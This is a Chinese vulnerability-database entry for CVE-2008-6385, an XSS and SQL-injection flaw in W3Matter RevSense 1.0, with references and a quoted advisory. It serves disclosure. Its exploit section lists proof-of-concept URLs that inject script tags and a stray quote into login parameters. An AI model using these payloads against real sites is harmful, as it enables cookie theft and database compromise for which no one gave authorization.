W3Matter RevSense 'index.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116929 漏洞类型 跨站脚本
发布时间 2008-12-04 更新时间 2009-03-10
CVE编号 CVE-2008-6385 CNNVD-ID CNNVD-200903-039
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32641
https://www.securityfocus.com/bid/32624
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-039
|漏洞详情
W3matterRevSense1.0版本的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助会话参数,注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/32624/info

RevSense is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

RevSense 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"&section=user&action=login
http://www.example.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya
http://www.example.com/index.php?section=<script>alert(1369)</script>&action=login
|受影响的产品
W3matter RevSense 1.0
|参考资料

来源:XF
名称:revsense-index-xss(47066)
链接:http://xforce.iss.net/xforce/xfdb/47066
来源:SECUNIA
名称:32996
链接:http://secunia.com/advisories/32996
来源:MISC
链接:http://packetstorm.linuxsecurity.com/0812-exploits/revsense-sqlxss.txt